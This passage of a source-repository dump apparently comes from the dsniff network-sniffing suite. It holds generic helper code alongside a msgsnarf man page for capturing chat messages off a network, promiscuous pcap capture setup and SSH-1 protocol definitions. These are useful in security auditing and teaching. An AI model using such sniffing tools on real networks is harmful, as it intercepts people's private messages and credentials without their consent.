SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; 28 | * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, 29 | * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 30 | * OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF 31 | * ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 32 | */ 33 | 34 | #ifndef _LIBGEN_H_ 35 | #define _LIBGEN_H_ 36 | 37 | char *basename(const char *); 38 | char *dirname(const char *); 39 | 40 | #endif /* _LIBGEN_H_ */ 41 | -------------------------------------------------------------------------------- /missing/md5.h: -------------------------------------------------------------------------------- 1 | #ifndef MD5_H 2 | #define MD5_H 3 | 4 | struct MD5Context { 5 | u_int32_t buf[4]; 6 | u_int32_t bits[2]; 7 | unsigned char in[64]; 8 | }; 9 | 10 | void MD5Init(struct MD5Context *context); 11 | void MD5Update(struct MD5Context *context, unsigned char const *buf, 12 | unsigned len); 13 | void MD5Final(unsigned char digest[16], struct MD5Context *context); 14 | void MD5Transform(u_int32_t buf[4], u_int32_t const in[16]); 15 | 16 | /* 17 | * This is needed to make RSAREF happy on some MS-DOS compilers. 18 | */ 19 | typedef struct MD5Context MD5_CTX; 20 | 21 | #endif /* !MD5_H */ 22 | -------------------------------------------------------------------------------- /missing/memcmp.c: -------------------------------------------------------------------------------- 1 | /* $Id: memcmp.c,v 1.1 2000/11/29 13:57:46 dugsong Exp $ */ 2 | /*- 3 | * Copyright (c) 1990 The Regents of the University of California. 4 | * All rights reserved. 5 | * 6 | * This code is derived from software contributed to Berkeley by 7 | * Chris Torek. 8 | * 9 | * Redistribution and use in source and binary forms, with or without 10 | * modification, are permitted provided that the following conditions 11 | * are met: 12 | * 1. Redistributions of source code must retain the above copyright 13 | * notice, this list of conditions and the following disclaimer. 14 | * 2. Redistributions in binary form must reproduce the above copyright 15 | * notice, this list of conditions and the following disclaimer in the 16 | * documentation and/or other materials provided with the distribution. 17 | * 3. All advertising materials mentioning features or use of this software 18 | * must display the following acknowledgement: 19 | * This product includes software developed by the University of 20 | * California, Berkeley and its contributors. 21 | * 4. Neither the name of the University nor the names of its contributors 22 | * may be used to endorse or promote products derived from this software 23 | * without specific prior written permission. 24 | * 25 | * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND 26 | * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 27 | * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE 28 | * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE 29 | * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 30 | * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS 31 | * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) 32 | * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT 33 | * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY 34 | * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF 35 | * SUCH DAMAGE. 36 | */ 37 | 38 | #include 39 | 40 | /* 41 | * Compare memory regions. 42 | */ 43 | int 44 | memcmp(s1, s2, n) 45 | const void *s1, *s2; 46 | size_t n; 47 | { 48 | if (n != 0) { 49 | register const unsigned char *p1 = s1, *p2 = s2; 50 | 51 | do { 52 | if (*p1++ != *p2++) 53 | return (*--p1 - *--p2); 54 | } while (--n != 0); 55 | } 56 | return (0); 57 | } 58 | -------------------------------------------------------------------------------- /missing/strlcat.c: -------------------------------------------------------------------------------- 1 | /* $Id: strlcat.c,v 1.1 2000/04/08 20:50:28 dugsong Exp $ */ 2 | /* $OpenBSD: strlcat.c,v 1.1 1998/07/01 01:29:45 millert Exp $ */ 3 | 4 | /* 5 | * Copyright (c) 1998 Todd C. Miller 6 | * All rights reserved. 7 | * 8 | * Redistribution and use in source and binary forms, with or without 9 | * modification, are permitted provided that the following conditions 10 | * are met: 11 | * 1. Redistributions of source code must retain the above copyright 12 | * notice, this list of conditions and the following disclaimer. 13 | * 2. Redistributions in binary form must reproduce the above copyright 14 | * notice, this list of conditions and the following disclaimer in the 15 | * documentation and/or other materials provided with the distribution. 16 | * 3. The name of the author may not be used to endorse or promote products 17 | * derived from this software without specific prior written permission. 18 | * 19 | * THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, 20 | * INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY 21 | * AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL 22 | * THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, 23 | * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, 24 | * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; 25 | * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, 26 | * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 27 | * OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF 28 | * ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 29 | */ 30 | 31 | #if defined(LIBC_SCCS) && !defined(lint) 32 | static char *rcsid = "$OpenBSD: strlcat.c,v 1.1 1998/07/01 01:29:45 millert Exp $"; 33 | #endif /* LIBC_SCCS and not lint */ 34 | 35 | #include 36 | #include 37 | 38 | /* 39 | * Appends src to string dst of size siz (unlike strncat, siz is the 40 | * full size of dst, not space left). At most siz-1 characters 41 | * will be copied. Always NUL terminates (unless siz == 0). 42 | * Returns strlen(src); if retval >= siz, truncation occurred. 43 | */ 44 | size_t strlcat(dst, src, siz) 45 | char *dst; 46 | const char *src; 47 | size_t siz; 48 | { 49 | register char *d = dst; 50 | register const char *s = src; 51 | register size_t n = siz; 52 | size_t dlen; 53 | 54 | /* Find the end of dst and adjust bytes left */ 55 | while (*d != '\0' && n != 0) 56 | d++; 57 | dlen = d - dst; 58 | n -= dlen; 59 | 60 | if (n == 0) 61 | return(dlen + strlen(s)); 62 | while (*s != '\0') { 63 | if (n != 1) { 64 | *d++ = *s; 65 | n--; 66 | } 67 | s++; 68 | } 69 | *d = '\0'; 70 | 71 | return(dlen + (s - src)); /* count does not include NUL */ 72 | } 73 | -------------------------------------------------------------------------------- /missing/strlcat.h: -------------------------------------------------------------------------------- 1 | size_t strlcat(char *dst, const char *src, size_t siz); 2 | -------------------------------------------------------------------------------- /missing/strlcpy.c: -------------------------------------------------------------------------------- 1 | /* $Id: strlcpy.c,v 1.1 2000/04/08 20:50:28 dugsong Exp $ */ 2 | /* $OpenBSD: strlcpy.c,v 1.2 1998/11/06 04:33:16 wvdputte Exp $ */ 3 | 4 | /* 5 | * Copyright (c) 1998 Todd C. Miller 6 | * All rights reserved. 7 | * 8 | * Redistribution and use in source and binary forms, with or without 9 | * modification, are permitted provided that the following conditions 10 | * are met: 11 | * 1. Redistributions of source code must retain the above copyright 12 | * notice, this list of conditions and the following disclaimer. 13 | * 2. Redistributions in binary form must reproduce the above copyright 14 | * notice, this list of conditions and the following disclaimer in the 15 | * documentation and/or other materials provided with the distribution. 16 | * 3. The name of the author may not be used to endorse or promote products 17 | * derived from this software without specific prior written permission. 18 | * 19 | * THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, 20 | * INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY 21 | * AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL 22 | * THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, 23 | * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, 24 | * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; 25 | * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, 26 | * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR 27 | * OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF 28 | * ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 29 | */ 30 | 31 | #if defined(LIBC_SCCS) && !defined(lint) 32 | static char *rcsid = "$OpenBSD: strlcpy.c,v 1.2 1998/11/06 04:33:16 wvdputte Exp $"; 33 | #endif /* LIBC_SCCS and not lint */ 34 | 35 | #include 36 | #include 37 | 38 | /* 39 | * Copy src to string dst of size siz. At most siz-1 characters 40 | * will be copied. Always NUL terminates (unless siz == 0). 41 | * Returns strlen(src); if retval >= siz, truncation occurred. 42 | */ 43 | size_t strlcpy(dst, src, siz) 44 | char *dst; 45 | const char *src; 46 | size_t siz; 47 | { 48 | register char *d = dst; 49 | register const char *s = src; 50 | register size_t n = siz; 51 | 52 | if (n == 0) 53 | return(strlen(s)); 54 | while (*s != '\0') { 55 | if (n != 1) { 56 | *d++ = *s; 57 | n--; 58 | } 59 | s++; 60 | } 61 | *d = '\0'; 62 | 63 | return(s - src); /* count does not include NUL */ 64 | } 65 | -------------------------------------------------------------------------------- /missing/strlcpy.h: -------------------------------------------------------------------------------- 1 | size_t strlcpy(char *dst, const char *src, size_t siz); 2 | -------------------------------------------------------------------------------- /missing/strsep.c: -------------------------------------------------------------------------------- 1 | /* $Id: strsep.c,v 1.1 2000/11/28 18:26:52 dugsong Exp $ */ 2 | /* $OpenBSD: strsep.c,v 1.3 1997/08/20 04:28:14 millert Exp $ */ 3 | 4 | /*- 5 | * Copyright (c) 1990, 1993 6 | * The Regents of the University of California. All rights reserved. 7 | * 8 | * Redistribution and use in source and binary forms, with or without 9 | * modification, are permitted provided that the following conditions 10 | * are met: 11 | * 1. Redistributions of source code must retain the above copyright 12 | * notice, this list of conditions and the following disclaimer. 13 | * 2. Redistributions in binary form must reproduce the above copyright 14 | * notice, this list of conditions and the following disclaimer in the 15 | * documentation and/or other materials provided with the distribution. 16 | * 3. All advertising materials mentioning features or use of this software 17 | * must display the following acknowledgement: 18 | * This product includes software developed by the University of 19 | * California, Berkeley and its contributors. 20 | * 4. Neither the name of the University nor the names of its contributors 21 | * may be used to endorse or promote products derived from this software 22 | * without specific prior written permission. 23 | * 24 | * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND 25 | * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 26 | * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE 27 | * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE 28 | * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 29 | * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS 30 | * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) 31 | * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT 32 | * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY 33 | * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF 34 | * SUCH DAMAGE. 35 | */ 36 | 37 | #include 38 | #include 39 | 40 | /* 41 | * Get next token from string *stringp, where tokens are possibly-empty 42 | * strings separated by characters from delim. 43 | * 44 | * Writes NULs into the string at *stringp to end tokens. 45 | * delim need not remain constant from call to call. 46 | * On return, *stringp points past the last NUL written (if there might 47 | * be further tokens), or is NULL (if there are definitely no more tokens). 48 | * 49 | * If *stringp is NULL, strsep returns NULL. 50 | */ 51 | char * 52 | strsep(stringp, delim) 53 | register char **stringp; 54 | register const char *delim; 55 | { 56 | register char *s; 57 | register const char *spanp; 58 | register int c, sc; 59 | char *tok; 60 | 61 | if ((s = *stringp) == NULL) 62 | return (NULL); 63 | for (tok = s;;) { 64 | c = *s++; 65 | spanp = delim; 66 | do { 67 | if ((sc = *spanp++) == c) { 68 | if (c == 0) 69 | s = NULL; 70 | else 71 | s[-1] = 0; 72 | *stringp = s; 73 | return (tok); 74 | } 75 | } while (sc != 0); 76 | } 77 | /* NOTREACHED */ 78 | } 79 | -------------------------------------------------------------------------------- /mount.c: -------------------------------------------------------------------------------- 1 | /* 2 | * Please do not edit this file. 3 | * It was generated using rpcgen. 4 | */ 5 | 6 | #include "mount.h" 7 | 8 | bool_t 9 | xdr_fhandle (XDR *xdrs, fhandle objp) 10 | { 11 | register int32_t *buf; 12 | 13 | if (!xdr_opaque (xdrs, objp, FHSIZE)) 14 | return FALSE; 15 | return TRUE; 16 | } 17 | 18 | bool_t 19 | xdr_fhandle3 (XDR *xdrs, fhandle3 *objp) 20 | { 21 | register int32_t *buf; 22 | 23 | if (!xdr_bytes (xdrs, (char **)&objp->fhandle3_val, (u_int *) &objp->fhandle3_len, FHSIZE3)) 24 | return FALSE; 25 | return TRUE; 26 | } 27 | 28 | bool_t 29 | xdr_fhstatus (XDR *xdrs, fhstatus *objp) 30 | { 31 | register int32_t *buf; 32 | 33 | if (!xdr_u_int (xdrs, &objp->fhs_status)) 34 | return FALSE; 35 | switch (objp->fhs_status) { 36 | case 0: 37 | if (!xdr_fhandle (xdrs, objp->fhstatus_u.fhs_fhandle)) 38 | return FALSE; 39 | break; 40 | default: 41 | break; 42 | } 43 | return TRUE; 44 | } 45 | 46 | #define fhs_fh fhstatus_u.fhs_fhandle 47 | 48 | bool_t 49 | xdr_mountstat3 (XDR *xdrs, mountstat3 *objp) 50 | { 51 | register int32_t *buf; 52 | 53 | if (!xdr_enum (xdrs, (enum_t *) objp)) 54 | return FALSE; 55 | return TRUE; 56 | } 57 | 58 | bool_t 59 | xdr_mountres3_ok (XDR *xdrs, mountres3_ok *objp) 60 | { 61 | register int32_t *buf; 62 | 63 | if (!xdr_fhandle3 (xdrs, &objp->fhandle)) 64 | return FALSE; 65 | if (!xdr_array (xdrs, (char **)&objp->auth_flavors.auth_flavors_val, (u_int *) &objp->auth_flavors.auth_flavors_len, ~0, 66 | sizeof (int), (xdrproc_t) xdr_int)) 67 | return FALSE; 68 | return TRUE; 69 | } 70 | 71 | bool_t 72 | xdr_mountres3 (XDR *xdrs, mountres3 *objp) 73 | { 74 | register int32_t *buf; 75 | 76 | if (!xdr_mountstat3 (xdrs, &objp->fhs_status)) 77 | return FALSE; 78 | switch (objp->fhs_status) { 79 | case MNT_OK: 80 | if (!xdr_mountres3_ok (xdrs, &objp->mountres3_u.mountinfo)) 81 | return FALSE; 82 | break; 83 | default: 84 | break; 85 | } 86 | return TRUE; 87 | } 88 | 89 | bool_t 90 | xdr_dirpath (XDR *xdrs, dirpath *objp) 91 | { 92 | register int32_t *buf; 93 | 94 | if (!xdr_string (xdrs, objp, MNTPATHLEN)) 95 | return FALSE; 96 | return TRUE; 97 | } 98 | -------------------------------------------------------------------------------- /msgsnarf.8: -------------------------------------------------------------------------------- 1 | .TH MSGSNARF 8 2 | .ad 3 | .fi 4 | .SH NAME 5 | msgsnarf 6 | \- 7 | sniff chat messages 8 | .SH SYNOPSIS 9 | .na 10 | .nf 11 | .fi 12 | \fBmsgsnarf\fR [\fB-i \fIinterface\fR | \fB-p \fIpcapfile\fR] [[\fB-v\fR] \fIpattern [\fIexpression\fR]] 13 | .SH DESCRIPTION 14 | .ad 15 | .fi 16 | \fBmsgsnarf\fR records selected messages from AOL Instant 17 | Messenger, ICQ 2000, IRC, MSN Messenger, or Yahoo Messenger chat 18 | sessions. 19 | .SH OPTIONS 20 | .IP "\fB-i \fIinterface\fR" 21 | Specify the interface to listen on. 22 | .IP "\fB-p \fIpcapfile\fR" 23 | Process packets from the specified PCAP capture file instead of the network. 24 | .IP \fB-v\fR 25 | "Versus" mode. Invert the sense of matching, to select non-matching 26 | messages. 27 | .IP \fIpattern\fR 28 | Specify regular expression for message matching. 29 | .IP "\fIexpression\fR" 30 | Specify a tcpdump(8) filter expression to select traffic to sniff. 31 | .SH "SEE ALSO" 32 | dsniff(8) 33 | .SH AUTHOR 34 | .na 35 | .nf 36 | Dug Song 37 | -------------------------------------------------------------------------------- /options.h: -------------------------------------------------------------------------------- 1 | /* 2 | * options.h 3 | * 4 | * Global options. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: options.h,v 1.4 2001/03/15 08:33:06 dugsong Exp $ 9 | */ 10 | 11 | #ifndef OPTIONS_H 12 | #define OPTIONS_H 13 | 14 | extern int Opt_client; 15 | extern u_short Opt_dns; 16 | extern int Opt_debug; 17 | extern int Opt_magic; 18 | extern int Opt_read; 19 | extern int Opt_write; 20 | extern int Opt_snaplen; 21 | extern int Opt_lines; 22 | extern int Opt_verbose; 23 | extern int Opt_show_dups; 24 | extern int Opt_color; 25 | 26 | #endif /* OPTIONS_H */ 27 | 28 | -------------------------------------------------------------------------------- /pathnames.h: -------------------------------------------------------------------------------- 1 | /* 2 | * pathnames.h 3 | * 4 | * dsniff pathnames. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: pathnames.h,v 1.2 2001/03/15 08:33:06 dugsong Exp $ 9 | */ 10 | 11 | #ifndef PATHNAMES_H 12 | #define PATHNAMES_H 13 | 14 | #ifndef DSNIFF_LIBDIR 15 | #define DSNIFF_LIBDIR "/usr/share/dsniff/" 16 | #endif 17 | 18 | #define DSNIFF_SERVICES "dsniff.services" 19 | #define DSNIFF_MAGIC "dsniff.magic" 20 | 21 | #endif /* PATHNAMES_H */ 22 | -------------------------------------------------------------------------------- /pcaputil.c: -------------------------------------------------------------------------------- 1 | /* 2 | * pcaputil.c 3 | * 4 | * Copyright (c) 2000 Dug Song 5 | * 6 | * $Id: pcaputil.c,v 1.2 2001/03/15 08:33:04 dugsong Exp $ 7 | */ 8 | 9 | #include "config.h" 10 | 11 | #include 12 | #include 13 | #include 14 | 15 | #if defined(BSD) && !defined(__FreeBSD__) 16 | # define WITH_BPF 1 17 | #endif 18 | 19 | #include 20 | #include 21 | #include 22 | #include 23 | #include 24 | #ifdef WITH_BPF 25 | # include 26 | #endif 27 | 28 | #include "pcaputil.h" 29 | 30 | #ifdef WITH_BPF 31 | static int 32 | bpf_immediate(int fd, int on) 33 | { 34 | return (ioctl(fd, BIOCIMMEDIATE, &on)); 35 | } 36 | #endif 37 | 38 | int 39 | pcap_dloff(pcap_t *pd) 40 | { 41 | int offset = -1; 42 | 43 | switch (pcap_datalink(pd)) { 44 | case DLT_EN10MB: 45 | offset = 14; 46 | break; 47 | case DLT_IEEE802: 48 | offset = 22; 49 | break; 50 | case DLT_FDDI: 51 | offset = 21; 52 | break; 53 | #ifdef DLT_LOOP 54 | case DLT_LOOP: 55 | #endif 56 | case DLT_NULL: 57 | offset = 4; 58 | break; 59 | case DLT_LINUX_SLL: /* e.g. ppp */ 60 | offset = 16; 61 | break; 62 | default: 63 | warnx("unsupported datalink type"); 64 | break; 65 | } 66 | return (offset); 67 | } 68 | 69 | pcap_t * 70 | pcap_init_dsniff(char *intf, char *filter, int snaplen) 71 | { 72 | pcap_t *pd; 73 | u_int net, mask; 74 | struct bpf_program fcode; 75 | char ebuf[PCAP_ERRBUF_SIZE]; 76 | 77 | if (intf == NULL && (intf = pcap_lookupdev(ebuf)) == NULL) { 78 | warnx("%s", ebuf); 79 | return (NULL); 80 | } 81 | if ((pd = pcap_open_live(intf, snaplen, 1, 512, ebuf)) == NULL) { 82 | warnx("%s", ebuf); 83 | return (NULL); 84 | } 85 | if (pcap_lookupnet(intf, &net, &mask, ebuf) == -1) { 86 | warnx("%s", ebuf); 87 | return (NULL); 88 | } 89 | if (pcap_compile(pd, &fcode, filter, 1, mask) < 0) { 90 | pcap_perror(pd, "pcap_compile"); 91 | return (NULL); 92 | } 93 | if (pcap_setfilter(pd, &fcode) == -1) { 94 | pcap_perror(pd, "pcap_compile"); 95 | return (NULL); 96 | } 97 | #ifdef WITH_BPF 98 | if (bpf_immediate(pd->fd, 1) < 0) { 99 | perror("ioctl"); 100 | return (NULL); 101 | } 102 | #endif 103 | return (pd); 104 | } 105 | 106 | /* from tcpdump util.c. */ 107 | char * 108 | copy_argv(char **argv) 109 | { 110 | char **p, *buf, *src, *dst; 111 | u_int len = 0; 112 | 113 | p = argv; 114 | if (*p == 0) 115 | return (0); 116 | 117 | while (*p) 118 | len += strlen(*p++) + 1; 119 | 120 | if ((buf = (char *)malloc(len)) == NULL) 121 | err(1, "copy_argv: malloc"); 122 | 123 | p = argv; 124 | dst = buf; 125 | 126 | while ((src = *p++) != NULL) { 127 | while ((*dst++ = *src++) != '\0') 128 | ; 129 | dst[-1] = ' '; 130 | } 131 | dst[-1] = '\0'; 132 | 133 | return (buf); 134 | } 135 | -------------------------------------------------------------------------------- /pcaputil.h: -------------------------------------------------------------------------------- 1 | /* 2 | * pcaputil.h 3 | * 4 | * pcap utility routines. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: pcaputil.h,v 1.2 2001/03/15 08:33:06 dugsong Exp $ 9 | */ 10 | 11 | #ifndef PCAPUTIL_H 12 | #define PCAPUTIL_H 13 | 14 | pcap_t *pcap_init_dsniff(char *intf, char *filter, int snaplen); 15 | 16 | int pcap_dloff(pcap_t *pd); 17 | 18 | char *copy_argv(char **argv); 19 | 20 | #endif /* PCAPUTIL_H */ 21 | -------------------------------------------------------------------------------- /record.h: -------------------------------------------------------------------------------- 1 | /* 2 | * record.h 3 | * 4 | * Record interface. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: record.h,v 1.3 2001/03/15 08:33:06 dugsong Exp $ 9 | */ 10 | 11 | #ifndef RECORD_H 12 | #define RECORD_H 13 | 14 | int record_init(char *file); 15 | 16 | int record(u_int32_t src, u_int32_t dst, int proto, u_short sport, 17 | u_short dport, char *name, u_char *buf, int len); 18 | 19 | void record_dump(void); 20 | 21 | void record_close(void); 22 | 23 | #endif /* RECORD_H */ 24 | 25 | -------------------------------------------------------------------------------- /remote.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackerschoice/dsniff/da38bf437899cc1fbb8d7590a5f62c53a2f411fa/remote.c -------------------------------------------------------------------------------- /rpc.c: -------------------------------------------------------------------------------- 1 | /* 2 | * rpc.c 3 | * 4 | * Copyright (c) 2000 Dug Song 5 | * 6 | * $Id: rpc.c,v 1.8 2001/03/15 08:33:04 dugsong Exp $ 7 | */ 8 | 9 | #include "config.h" 10 | 11 | #include 12 | #include 13 | 14 | #include 15 | #include 16 | 17 | #include "decode.h" 18 | #include "rpc.h" 19 | 20 | #define XIDMAPSIZE 64 21 | 22 | static struct xid_map xid_maps[XIDMAPSIZE]; 23 | 24 | static int xid_map_next = 0; 25 | static int xid_map_hint = 0; 26 | 27 | /* xid_map adapted from tcpdump's print-nfs.c */ 28 | 29 | void 30 | xid_map_enter(u_int32_t xid, u_int32_t prog, u_int32_t vers, 31 | u_int32_t proc, void *data) 32 | { 33 | struct xid_map *mp; 34 | 35 | mp = &xid_maps[xid_map_next]; 36 | 37 | if (++xid_map_next >= XIDMAPSIZE) 38 | xid_map_next = 0; 39 | 40 | mp->xid = xid; 41 | mp->prog = prog; 42 | mp->vers = vers; 43 | mp->proc = proc; 44 | mp->data = data; 45 | } 46 | 47 | struct xid_map * 48 | xid_map_find(int xid) 49 | { 50 | struct xid_map *mp; 51 | int i; 52 | 53 | /* Start searching from where we last left off. */ 54 | i = xid_map_hint; 55 | do { 56 | mp = &xid_maps[i]; 57 | if (mp->xid == xid) { 58 | /* match */ 59 | xid_map_hint = i; 60 | return (mp); 61 | } 62 | if (++i >= XIDMAPSIZE) 63 | i = 0; 64 | } while (i != xid_map_hint); 65 | 66 | return (NULL); 67 | } 68 | 69 | int 70 | rpc_decode(u_char *buf, int len, struct rpc_msg *msg) 71 | { 72 | XDR xdrs; 73 | u_int32_t fraghdr; 74 | u_char *p, *tmp; 75 | int stat, tmplen; 76 | 77 | if (len < 20) 78 | return (0); 79 | 80 | p = buf + 4; 81 | 82 | /* If not recognizably RPC, try TCP record defragmentation */ 83 | if (pntohl(p) != CALL && pntohl(p) != REPLY) { 84 | tmp = buf; 85 | tmplen = 0; 86 | 87 | for (;;) { 88 | fraghdr = pntohl(tmp); 89 | 90 | if (FRAGLEN(fraghdr) + 4 > len) 91 | return (0); 92 | 93 | len -= 4; 94 | memmove(tmp, tmp + 4, len); 95 | tmplen += FRAGLEN(fraghdr); 96 | 97 | if (LASTFRAG(fraghdr)) 98 | break; 99 | 100 | tmp += FRAGLEN(fraghdr); 101 | len -= FRAGLEN(fraghdr); 102 | 103 | if (len < 4) 104 | return (0); 105 | } 106 | len = tmplen; 107 | } 108 | /* Decode RPC message. */ 109 | memset(msg, 0, sizeof(*msg)); 110 | 111 | if (ntohl(((struct rpc_msg *)buf)->rm_direction) == CALL) { 112 | xdrmem_create(&xdrs, buf, len, XDR_DECODE); 113 | 114 | if (!xdr_callmsg(&xdrs, msg)) { 115 | xdr_destroy(&xdrs); 116 | return (0); 117 | } 118 | } 119 | else if (ntohl(((struct rpc_msg *)buf)->rm_direction) == REPLY) { 120 | msg->acpted_rply.ar_results.proc = (xdrproc_t) xdr_void; 121 | xdrmem_create(&xdrs, buf, len, XDR_DECODE); 122 | 123 | if (!xdr_replymsg(&xdrs, msg)) { 124 | xdr_destroy(&xdrs); 125 | return (0); 126 | } 127 | } 128 | else 129 | return (0); 130 | 131 | stat = xdr_getpos(&xdrs); 132 | xdr_destroy(&xdrs); 133 | 134 | return (stat); 135 | } 136 | 137 | -------------------------------------------------------------------------------- /rpc.h: -------------------------------------------------------------------------------- 1 | /* 2 | * rpc.h 3 | * 4 | * RPC utility routines. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: rpc.h,v 1.4 2001/03/15 08:33:06 dugsong Exp $ 9 | */ 10 | 11 | #ifndef RPC_H 12 | #define RPC_H 13 | 14 | #define FRAGLEN(x) (x & 0x7fffffff) 15 | #define LASTFRAG(x) (x & (1 << 31)) 16 | 17 | struct xid_map { 18 | u_int32_t xid; 19 | u_int32_t prog; 20 | u_int32_t vers; 21 | u_int32_t proc; 22 | void *data; 23 | }; 24 | 25 | int rpc_decode(u_char *buf, int len, struct rpc_msg *msg); 26 | 27 | void xid_map_enter(u_int32_t xid, u_int32_t prog, u_int32_t vers, 28 | u_int32_t proc, void *data); 29 | 30 | struct xid_map *xid_map_find(int xid); 31 | 32 | #endif /* RPC_H */ 33 | 34 | -------------------------------------------------------------------------------- /ssh.h: -------------------------------------------------------------------------------- 1 | /* 2 | * ssh.h 3 | * 4 | * Minimal SSH-1 protocol implementation. 5 | * 6 | * Copyright (c) 2000 Dug Song 7 | * 8 | * $Id: ssh.h,v 1.3 2001/03/15 08:33:06 dugsong Exp $ 9 | */ 10 | 11 | #ifndef SSH_H 12 | #define SSH_H 13 | 14 | #define SSH_MAX_PADLEN 8 15 | #define SSH_MAX_PKTLEN 262144 16 | 17 | /* Authentication types. */ 18 | #define SSH_AUTH_PASSWORD 3 19 | 20 | /* Cipher types. */ 21 | #define SSH_CIPHER_NONE 0 22 | #define SSH_CIPHER_3DES 3 23 | #define SSH_CIPHER_BLOWFISH 6 24 | 25 | /* Message types. */ 26 | #define SSH_MSG_DISCONNECT 1 27 | #define SSH_SMSG_PUBLIC_KEY 2 28 | #define SSH_CMSG_SESSION_KEY 3 29 | #define SSH_CMSG_USER 4 30 | #define SSH_CMSG_AUTH_PASSWORD 9 31 | #define SSH_SMSG_SUCCESS 14 32 | #define SSH_SMSG_FAILURE 15 33 | #define SSH_CMSG_STDIN_DATA 16 34 | #define SSH_SMSG_STDOUT_DATA 17 35 | #define SSH_SMSG_STDERR_DATA 18 36 | #define SSH_SMSG_EXITSTATUS 20 37 | 38 | typedef struct ssh_ctx { 39 | int authmask; 40 | int encmask; 41 | RSA *servkey; 42 | RSA *hostkey; 43 | } SSH_CTX; 44 | 45 | typedef struct ssh { 46 | int fd; 47 | SSH_CTX *ctx; 48 | u_char sesskey[32]; 49 | void *estate; 50 | void *dstate; 51 | void (*encrypt)(u_char *src, u_char *dst, int len, void *state); 52 | void (*decrypt)(u_char *src, u_char *dst, int len, void *state); 53 | } SSH; 54 | 55 | void SSH_init(void); 56 | 57 | SSH_CTX *SSH_CTX_new(void); 58 | 59 | SSH *SSH_new(SSH_CTX *ctx); 60 | 61 | void SSH_set_fd(SSH *ssh, int fd); 62 | 63 | int SSH_accept(SSH *ssh); 64 | 65 | int SSH_connect(SSH *ssh); 66 | 67 | int SSH_recv(SSH *ssh, u_char *buf, int size); 68 | 69 | int SSH_send(SSH *ssh, u_char *buf, int len); 70 | 71 | void SSH_close(SSH *ssh); 72 | 73 | #endif /* SSH_H */ 74 | -------------------------------------------------------------------------------- /sshcrypto.h: -------------------------------------------------------------------------------- 1 | /* 2 | * sshcrypto.c 3 | * 4 | * 